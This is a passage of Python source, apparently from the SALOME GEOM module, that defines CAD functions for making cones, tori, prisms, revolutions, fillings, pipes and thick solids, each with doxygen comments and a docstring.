# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created cone.
#
# @ref tui_creation_cone "Example"
@ManageTransactions("PrimOp")
def MakeConeR1R2H(self, theR1, theR2, theH, theName=None):
"""
Create a cone with given height and radiuses at
the origin of coordinate system. Axis of the cone will
be collinear to the OZ axis of the coordinate system.
Parameters:
theR1 Radius of the first cone base.
theR2 Radius of the second cone base.
theH Cone height.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
If both radiuses are non-zero, the cone will be truncated.
If the radiuses are equal, a cylinder will be created instead.
Returns:
New GEOM.GEOM_Object, containing the created cone.
"""
# Example: see GEOM_TestAll.py
theR1,theR2,theH,Parameters = ParseParameters(theR1,theR2,theH)
anObj = self.PrimOp.MakeConeR1R2H(theR1, theR2, theH)
RaiseIfFailed("MakeConeR1R2H", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "cone")
return anObj
## Create a torus with given center, normal vector and radiuses.
# @param thePnt Torus central point.
# @param theVec Torus axis of symmetry.
# @param theRMajor Torus major radius.
# @param theRMinor Torus minor radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created torus.
#
# @ref tui_creation_torus "Example"
@ManageTransactions("PrimOp")
def MakeTorus(self, thePnt, theVec, theRMajor, theRMinor, theName=None):
"""
Create a torus with given center, normal vector and radiuses.
Parameters:
thePnt Torus central point.
theVec Torus axis of symmetry.
theRMajor Torus major radius.
theRMinor Torus minor radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created torus.
"""
# Example: see GEOM_TestAll.py
theRMajor,theRMinor,Parameters = ParseParameters(theRMajor,theRMinor)
anObj = self.PrimOp.MakeTorusPntVecRR(thePnt, theVec, theRMajor, theRMinor)
RaiseIfFailed("MakeTorusPntVecRR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "torus")
return anObj
## Create a torus with given radiuses at the origin of coordinate system.
# @param theRMajor Torus major radius.
# @param theRMinor Torus minor radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created torus.
#
# @ref tui_creation_torus "Example"
@ManageTransactions("PrimOp")
def MakeTorusRR(self, theRMajor, theRMinor, theName=None):
"""
Create a torus with given radiuses at the origin of coordinate system.
Parameters:
theRMajor Torus major radius.
theRMinor Torus minor radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created torus.
"""
# Example: see GEOM_TestAll.py
theRMajor,theRMinor,Parameters = ParseParameters(theRMajor,theRMinor)
anObj = self.PrimOp.MakeTorusRR(theRMajor, theRMinor)
RaiseIfFailed("MakeTorusRR", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "torus")
return anObj
# end of l3_3d_primitives
## @}
## @addtogroup l3_complex
## @{
## Create a shape by extrusion of the base shape along a vector, defined by two points.
# @param theBase Base shape to be extruded.
# @param thePoint1 First end of extrusion vector.
# @param thePoint2 Second end of extrusion vector.
# @param theScaleFactor Use it to make prism with scaled second base.
# Nagative value means not scaled second base.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrism(self, theBase, thePoint1, thePoint2, theScaleFactor = -1.0, theName=None):
"""
Create a shape by extrusion of the base shape along a vector, defined by two points.
Parameters:
theBase Base shape to be extruded.
thePoint1 First end of extrusion vector.
thePoint2 Second end of extrusion vector.
theScaleFactor Use it to make prism with scaled second base.
Nagative value means not scaled second base.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
anObj = None
Parameters = ""
if theScaleFactor > 0:
theScaleFactor,Parameters = ParseParameters(theScaleFactor)
anObj = self.PrimOp.MakePrismTwoPntWithScaling(theBase, thePoint1, thePoint2, theScaleFactor)
else:
anObj = self.PrimOp.MakePrismTwoPnt(theBase, thePoint1, thePoint2)
RaiseIfFailed("MakePrismTwoPnt", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by extrusion of the base shape along a
# vector, defined by two points, in 2 Ways (forward/backward).
# @param theBase Base shape to be extruded.
# @param thePoint1 First end of extrusion vector.
# @param thePoint2 Second end of extrusion vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrism2Ways(self, theBase, thePoint1, thePoint2, theName=None):
"""
Create a shape by extrusion of the base shape along a
vector, defined by two points, in 2 Ways (forward/backward).
Parameters:
theBase Base shape to be extruded.
thePoint1 First end of extrusion vector.
thePoint2 Second end of extrusion vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakePrismTwoPnt2Ways(theBase, thePoint1, thePoint2)
RaiseIfFailed("MakePrismTwoPnt", self.PrimOp)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by extrusion of the base shape along the vector,
# i.e. all the space, transfixed by the base shape during its translation
# along the vector on the given distance.
# @param theBase Base shape to be extruded.
# @param theVec Direction of extrusion.
# @param theH Prism dimension along theVec.
# @param theScaleFactor Use it to make prism with scaled second base.
# Negative value means not scaled second base.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrismVecH(self, theBase, theVec, theH, theScaleFactor = -1.0, theName=None):
"""
Create a shape by extrusion of the base shape along the vector,
i.e. all the space, transfixed by the base shape during its translation
along the vector on the given distance.
Parameters:
theBase Base shape to be extruded.
theVec Direction of extrusion.
theH Prism dimension along theVec.
theScaleFactor Use it to make prism with scaled second base.
Negative value means not scaled second base.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
anObj = None
Parameters = ""
if theScaleFactor > 0:
theH,theScaleFactor,Parameters = ParseParameters(theH,theScaleFactor)
anObj = self.PrimOp.MakePrismVecHWithScaling(theBase, theVec, theH, theScaleFactor)
else:
theH,Parameters = ParseParameters(theH)
anObj = self.PrimOp.MakePrismVecH(theBase, theVec, theH)
RaiseIfFailed("MakePrismVecH", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by extrusion of the base shape along the vector,
# i.e. all the space, transfixed by the base shape during its translation
# along the vector on the given distance in 2 Ways (forward/backward).
# @param theBase Base shape to be extruded.
# @param theVec Direction of extrusion.
# @param theH Prism dimension along theVec in forward direction.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrismVecH2Ways(self, theBase, theVec, theH, theName=None):
"""
Create a shape by extrusion of the base shape along the vector,
i.e. all the space, transfixed by the base shape during its translation
along the vector on the given distance in 2 Ways (forward/backward).
Parameters:
theBase Base shape to be extruded.
theVec Direction of extrusion.
theH Prism dimension along theVec in forward direction.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
theH,Parameters = ParseParameters(theH)
anObj = self.PrimOp.MakePrismVecH2Ways(theBase, theVec, theH)
RaiseIfFailed("MakePrismVecH2Ways", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by extrusion of the base shape along the dx, dy, dz direction
# @param theBase Base shape to be extruded.
# @param theDX, theDY, theDZ Directions of extrusion.
# @param theScaleFactor Use it to make prism with scaled second base.
# Nagative value means not scaled second base.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrismDXDYDZ(self, theBase, theDX, theDY, theDZ, theScaleFactor = -1.0, theName=None):
"""
Create a shape by extrusion of the base shape along the dx, dy, dz direction
Parameters:
theBase Base shape to be extruded.
theDX, theDY, theDZ Directions of extrusion.
theScaleFactor Use it to make prism with scaled second base.
Nagative value means not scaled second base.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
anObj = None
Parameters = ""
if theScaleFactor > 0:
theDX,theDY,theDZ,theScaleFactor,Parameters = ParseParameters(theDX, theDY, theDZ, theScaleFactor)
anObj = self.PrimOp.MakePrismDXDYDZWithScaling(theBase, theDX, theDY, theDZ, theScaleFactor)
else:
theDX,theDY,theDZ,Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.PrimOp.MakePrismDXDYDZ(theBase, theDX, theDY, theDZ)
RaiseIfFailed("MakePrismDXDYDZ", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by extrusion of the base shape along the dx, dy, dz direction
# i.e. all the space, transfixed by the base shape during its translation
# along the vector on the given distance in 2 Ways (forward/backward).
# @param theBase Base shape to be extruded.
# @param theDX, theDY, theDZ Directions of extrusion.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created prism.
#
# @ref tui_creation_prism "Example"
@ManageTransactions("PrimOp")
def MakePrismDXDYDZ2Ways(self, theBase, theDX, theDY, theDZ, theName=None):
"""
Create a shape by extrusion of the base shape along the dx, dy, dz direction
i.e. all the space, transfixed by the base shape during its translation
along the vector on the given distance in 2 Ways (forward/backward).
Parameters:
theBase Base shape to be extruded.
theDX, theDY, theDZ Directions of extrusion.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created prism.
"""
# Example: see GEOM_TestAll.py
theDX,theDY,theDZ,Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.PrimOp.MakePrismDXDYDZ2Ways(theBase, theDX, theDY, theDZ)
RaiseIfFailed("MakePrismDXDYDZ2Ways", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "prism")
return anObj
## Create a shape by revolution of the base shape around the axis
# on the given angle, i.e. all the space, transfixed by the base
# shape during its rotation around the axis on the given angle.
# @param theBase Base shape to be rotated.
# @param theAxis Rotation axis.
# @param theAngle Rotation angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created revolution.
#
# @ref tui_creation_revolution "Example"
@ManageTransactions("PrimOp")
def MakeRevolution(self, theBase, theAxis, theAngle, theName=None):
"""
Create a shape by revolution of the base shape around the axis
on the given angle, i.e. all the space, transfixed by the base
shape during its rotation around the axis on the given angle.
Parameters:
theBase Base shape to be rotated.
theAxis Rotation axis.
theAngle Rotation angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created revolution.
"""
# Example: see GEOM_TestAll.py
theAngle,Parameters = ParseParameters(theAngle)
anObj = self.PrimOp.MakeRevolutionAxisAngle(theBase, theAxis, theAngle)
RaiseIfFailed("MakeRevolutionAxisAngle", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "revolution")
return anObj
## Create a shape by revolution of the base shape around the axis
# on the given angle, i.e. all the space, transfixed by the base
# shape during its rotation around the axis on the given angle in
# both directions (forward/backward)
# @param theBase Base shape to be rotated.
# @param theAxis Rotation axis.
# @param theAngle Rotation angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created revolution.
#
# @ref tui_creation_revolution "Example"
@ManageTransactions("PrimOp")
def MakeRevolution2Ways(self, theBase, theAxis, theAngle, theName=None):
"""
Create a shape by revolution of the base shape around the axis
on the given angle, i.e. all the space, transfixed by the base
shape during its rotation around the axis on the given angle in
both directions (forward/backward).
Parameters:
theBase Base shape to be rotated.
theAxis Rotation axis.
theAngle Rotation angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created revolution.
"""
theAngle,Parameters = ParseParameters(theAngle)
anObj = self.PrimOp.MakeRevolutionAxisAngle2Ways(theBase, theAxis, theAngle)
RaiseIfFailed("MakeRevolutionAxisAngle2Ways", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "revolution")
return anObj
## Create a filling from the given compound of contours.
# @param theShape the compound of contours
# @param theMinDeg a minimal degree of BSpline surface to create
# @param theMaxDeg a maximal degree of BSpline surface to create
# @param theTol2D a 2d tolerance to be reached
# @param theTol3D a 3d tolerance to be reached
# @param theNbIter a number of iteration of approximation algorithm
# @param theMethod Kind of method to perform filling operation(see GEOM::filling_oper_method())
# @param isApprox if True, BSpline curves are generated in the process
# of surface construction. By default it is False, that means
# the surface is created using given curves. The usage of
# Approximation makes the algorithm work slower, but allows
# building the surface for rather complex cases.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created filling surface.
#
# @ref tui_creation_filling "Example"
@ManageTransactions("PrimOp")
def MakeFilling(self, theShape, theMinDeg=2, theMaxDeg=5, theTol2D=0.0001,
theTol3D=0.0001, theNbIter=0, theMethod=GEOM.FOM_Default, isApprox=0, theName=None):
"""
Create a filling from the given compound of contours.
Parameters:
theShape the compound of contours
theMinDeg a minimal degree of BSpline surface to create
theMaxDeg a maximal degree of BSpline surface to create
theTol2D a 2d tolerance to be reached
theTol3D a 3d tolerance to be reached
theNbIter a number of iteration of approximation algorithm
theMethod Kind of method to perform filling operation(see GEOM::filling_oper_method())
isApprox if True, BSpline curves are generated in the process
of surface construction. By default it is False, that means
the surface is created using given curves. The usage of
Approximation makes the algorithm work slower, but allows
building the surface for rather complex cases
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created filling surface.
Example of usage:
filling = geompy.MakeFilling(compound, 2, 5, 0.0001, 0.0001, 5)
"""
# Example: see GEOM_TestAll.py
theMinDeg,theMaxDeg,theTol2D,theTol3D,theNbIter,Parameters = ParseParameters(theMinDeg, theMaxDeg, theTol2D, theTol3D, theNbIter)
anObj = self.PrimOp.MakeFilling(theShape, theMinDeg, theMaxDeg,
theTol2D, theTol3D, theNbIter,
theMethod, isApprox)
RaiseIfFailed("MakeFilling", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "filling")
return anObj
## Create a filling from the given compound of contours.
# This method corresponds to MakeFilling with isApprox=True
# @param theShape the compound of contours
# @param theMinDeg a minimal degree of BSpline surface to create
# @param theMaxDeg a maximal degree of BSpline surface to create
# @param theTol3D a 3d tolerance to be reached
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created filling surface.
#
# @ref tui_creation_filling "Example"
@ManageTransactions("PrimOp")
def MakeFillingNew(self, theShape, theMinDeg=2, theMaxDeg=5, theTol3D=0.0001, theName=None):
"""
Create a filling from the given compound of contours.
This method corresponds to MakeFilling with isApprox=True
Parameters:
theShape the compound of contours
theMinDeg a minimal degree of BSpline surface to create
theMaxDeg a maximal degree of BSpline surface to create
theTol3D a 3d tolerance to be reached
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created filling surface.
Example of usage:
filling = geompy.MakeFillingNew(compound, 2, 5, 0.0001)
"""
# Example: see GEOM_TestAll.py
theMinDeg,theMaxDeg,theTol3D,Parameters = ParseParameters(theMinDeg, theMaxDeg, theTol3D)
anObj = self.PrimOp.MakeFilling(theShape, theMinDeg, theMaxDeg,
0, theTol3D, 0, GEOM.FOM_Default, True)
RaiseIfFailed("MakeFillingNew", self.PrimOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "filling")
return anObj
## Create a shell or solid passing through set of sections.Sections should be wires,edges or vertices.
# @param theSeqSections - set of specified sections.
# @param theModeSolid - mode defining building solid or shell
# @param thePreci - precision 3D used for smoothing
# @param theRuled - mode defining type of the result surfaces (ruled or smoothed).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created shell or solid.
#
# @ref swig_todo "Example"
@ManageTransactions("PrimOp")
def MakeThruSections(self, theSeqSections, theModeSolid, thePreci, theRuled, theName=None):
"""
Create a shell or solid passing through set of sections.Sections should be wires,edges or vertices.
Parameters:
theSeqSections - set of specified sections.
theModeSolid - mode defining building solid or shell
thePreci - precision 3D used for smoothing
theRuled - mode defining type of the result surfaces (ruled or smoothed).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created shell or solid.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeThruSections(theSeqSections,theModeSolid,thePreci,theRuled)
RaiseIfFailed("MakeThruSections", self.PrimOp)
self._autoPublish(anObj, theName, "filling")
return anObj
## Create a shape by extrusion of the base shape along
# the path shape. The path shape can be a wire or an edge.
# @param theBase Base shape to be extruded.
# @param thePath Path shape to extrude the base shape along it.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created pipe.
#
# @ref tui_creation_pipe "Example"
@ManageTransactions("PrimOp")
def MakePipe(self, theBase, thePath, theName=None):
"""
Create a shape by extrusion of the base shape along
the path shape. The path shape can be a wire or an edge.
Parameters:
theBase Base shape to be extruded.
thePath Path shape to extrude the base shape along it.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created pipe.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakePipe(theBase, thePath)
RaiseIfFailed("MakePipe", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
## Create a shape by extrusion of the profile shape along
# the path shape. The path shape can be a wire or an edge.
# the several profiles can be specified in the several locations of path.
# @param theSeqBases - list of Bases shape to be extruded.
# @param theLocations - list of locations on the path corresponding
# specified list of the Bases shapes. Number of locations
# should be equal to number of bases or list of locations can be empty.
# @param thePath - Path shape to extrude the base shape along it.
# @param theWithContact - the mode defining that the section is translated to be in
# contact with the spine.
# @param theWithCorrection - defining that the section is rotated to be
# orthogonal to the spine tangent in the correspondent point
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created pipe.
#
# @ref tui_creation_pipe_with_diff_sec "Example"
@ManageTransactions("PrimOp")
def MakePipeWithDifferentSections(self, theSeqBases,
theLocations, thePath,
theWithContact, theWithCorrection, theName=None):
"""
Create a shape by extrusion of the profile shape along
the path shape. The path shape can be a wire or an edge.
the several profiles can be specified in the several locations of path.
Parameters:
theSeqBases - list of Bases shape to be extruded.
theLocations - list of locations on the path corresponding
specified list of the Bases shapes. Number of locations
should be equal to number of bases or list of locations can be empty.
thePath - Path shape to extrude the base shape along it.
theWithContact - the mode defining that the section is translated to be in
contact with the spine(0/1)
theWithCorrection - defining that the section is rotated to be
orthogonal to the spine tangent in the correspondent point (0/1)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created pipe.
"""
anObj = self.PrimOp.MakePipeWithDifferentSections(theSeqBases,
theLocations, thePath,
theWithContact, theWithCorrection)
RaiseIfFailed("MakePipeWithDifferentSections", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
## Create a shape by extrusion of the profile shape along
# the path shape. The path shape can be a wire or a edge.
# the several profiles can be specified in the several locations of path.
# @param theSeqBases - list of Bases shape to be extruded. Base shape must be
# shell or face. If number of faces in neighbour sections
# aren't coincided result solid between such sections will
# be created using external boundaries of this shells.
# @param theSeqSubBases - list of corresponding sub-shapes of section shapes.
# This list is used for searching correspondences between
# faces in the sections. Size of this list must be equal
# to size of list of base shapes.
# @param theLocations - list of locations on the path corresponding
# specified list of the Bases shapes. Number of locations
# should be equal to number of bases. First and last
# locations must be coincided with first and last vertexes
# of path correspondingly.
# @param thePath - Path shape to extrude the base shape along it.
# @param theWithContact - the mode defining that the section is translated to be in
# contact with the spine.
# @param theWithCorrection - defining that the section is rotated to be
# orthogonal to the spine tangent in the correspondent point
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solids.
#
# @ref tui_creation_pipe_with_shell_sec "Example"
@ManageTransactions("PrimOp")
def MakePipeWithShellSections(self, theSeqBases, theSeqSubBases,
theLocations, thePath,
theWithContact, theWithCorrection, theName=None):
"""
Create a shape by extrusion of the profile shape along
the path shape. The path shape can be a wire or a edge.
the several profiles can be specified in the several locations of path.
Parameters:
theSeqBases - list of Bases shape to be extruded. Base shape must be
shell or face. If number of faces in neighbour sections
aren't coincided result solid between such sections will
be created using external boundaries of this shells.
theSeqSubBases - list of corresponding sub-shapes of section shapes.
This list is used for searching correspondences between
faces in the sections. Size of this list must be equal
to size of list of base shapes.
theLocations - list of locations on the path corresponding
specified list of the Bases shapes. Number of locations
should be equal to number of bases. First and last
locations must be coincided with first and last vertexes
of path correspondingly.
thePath - Path shape to extrude the base shape along it.
theWithContact - the mode defining that the section is translated to be in
contact with the spine (0/1)
theWithCorrection - defining that the section is rotated to be
orthogonal to the spine tangent in the correspondent point (0/1)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solids.
"""
anObj = self.PrimOp.MakePipeWithShellSections(theSeqBases, theSeqSubBases,
theLocations, thePath,
theWithContact, theWithCorrection)
RaiseIfFailed("MakePipeWithShellSections", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
## Create a shape by extrusion of the profile shape along
# the path shape. This function is used only for debug pipe
# functionality - it is a version of function MakePipeWithShellSections()
# which give a possibility to recieve information about
# creating pipe between each pair of sections step by step.
@ManageTransactions("PrimOp")
def MakePipeWithShellSectionsBySteps(self, theSeqBases, theSeqSubBases,
theLocations, thePath,
theWithContact, theWithCorrection, theName=None):
"""
Create a shape by extrusion of the profile shape along
the path shape. This function is used only for debug pipe
functionality - it is a version of previous function
geompy.MakePipeWithShellSections() which give a possibility to
recieve information about creating pipe between each pair of
sections step by step.
"""
res = []
nbsect = len(theSeqBases)
nbsubsect = len(theSeqSubBases)
#print "nbsect = ",nbsect
for i in range(1,nbsect):
#print " i = ",i
tmpSeqBases = [ theSeqBases[i-1], theSeqBases[i] ]
tmpLocations = [ theLocations[i-1], theLocations[i] ]
tmpSeqSubBases = []
if nbsubsect>0: tmpSeqSubBases = [ theSeqSubBases[i-1], theSeqSubBases[i] ]
anObj = self.PrimOp.MakePipeWithShellSections(tmpSeqBases, tmpSeqSubBases,
tmpLocations, thePath,
theWithContact, theWithCorrection)
if self.PrimOp.IsDone() == 0:
print "Problems with pipe creation between ",i," and ",i+1," sections"
RaiseIfFailed("MakePipeWithShellSections", self.PrimOp)
break
else:
print "Pipe between ",i," and ",i+1," sections is OK"
res.append(anObj)
pass
pass
resc = self.MakeCompound(res)
#resc = self.MakeSewing(res, 0.001)
#print "resc: ",resc
self._autoPublish(resc, theName, "pipe")
return resc
## Create solids between given sections
# @param theSeqBases - list of sections (shell or face).
# @param theLocations - list of corresponding vertexes
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solids.
#
# @ref tui_creation_pipe_without_path "Example"
@ManageTransactions("PrimOp")
def MakePipeShellsWithoutPath(self, theSeqBases, theLocations, theName=None):
"""
Create solids between given sections
Parameters:
theSeqBases - list of sections (shell or face).
theLocations - list of corresponding vertexes
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solids.
"""
anObj = self.PrimOp.MakePipeShellsWithoutPath(theSeqBases, theLocations)
RaiseIfFailed("MakePipeShellsWithoutPath", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
## Create a shape by extrusion of the base shape along
# the path shape with constant bi-normal direction along the given vector.
# The path shape can be a wire or an edge.
# @param theBase Base shape to be extruded.
# @param thePath Path shape to extrude the base shape along it.
# @param theVec Vector defines a constant binormal direction to keep the
# same angle beetween the direction and the sections
# along the sweep surface.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created pipe.
#
# @ref tui_creation_pipe "Example"
@ManageTransactions("PrimOp")
def MakePipeBiNormalAlongVector(self, theBase, thePath, theVec, theName=None):
"""
Create a shape by extrusion of the base shape along
the path shape with constant bi-normal direction along the given vector.
The path shape can be a wire or an edge.
Parameters:
theBase Base shape to be extruded.
thePath Path shape to extrude the base shape along it.
theVec Vector defines a constant binormal direction to keep the
same angle beetween the direction and the sections
along the sweep surface.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created pipe.
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakePipeBiNormalAlongVector(theBase, thePath, theVec)
RaiseIfFailed("MakePipeBiNormalAlongVector", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
## Makes a thick solid from a face or a shell
# @param theShape Face or Shell to be thicken
# @param theThickness Thickness of the resulting solid
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solid
#
@ManageTransactions("PrimOp")
def MakeThickSolid(self, theShape, theThickness, theName=None):
"""
Make a thick solid from a face or a shell
Parameters:
theShape Face or Shell to be thicken
theThickness Thickness of the resulting solid
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solid
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeThickening(theShape, theThickness, True)
RaiseIfFailed("MakeThickening", self.PrimOp)
self._autoPublish(anObj, theName, "pipe")
return anObj
## Modifies a face or a shell to make it a thick solid
# @param theShape Face or Shell to be thicken
# @param theThickness Thickness of the resulting solid
#
# @return The modified shape
#
@ManageTransactions("PrimOp")
def Thicken(self, theShape, theThickness):
"""
Modifies a face or a shell to make it a thick solid
Parameters:
theBase Base shape to be extruded.
thePath Path shape to extrude the base shape along it.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
The modified shape
"""
# Example: see GEOM_TestAll.py
anObj = self.PrimOp.MakeThickening(theShape, theThickness, False)
RaiseIfFailed("MakeThickening", self.PrimOp)
return anObj
## Build a middle path of a pipe-like shape.
# The path shape can be a wire or an edge.
# @param theShape It can be closed or unclosed pipe-like shell
# or a pipe-like solid.
# @param theBase1, theBase2 Two bases of the supposed pipe. This
# should be wires or faces of theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note It is not assumed that exact or approximate copy of theShape
# can be obtained by applying existing Pipe operation on the
# resulting "Path" wire taking theBase1 as the base - it is not
# always possible; though in some particular cases it might work
# it is not guaranteed. Thus, RestorePath function should not be
# considered as an exact reverse operation of the Pipe.
#
# @return New GEOM.GEOM_Object, containing an edge or wire that represent
# source pipe's "path".
#
# @ref tui_creation_pipe_path "Example"
@ManageTransactions("PrimOp")
def RestorePath (self, theShape, theBase1, theBase2, theName=None):
"""
Build a middle path of a pipe-like shape.
The path shape can be a wire or an edge.
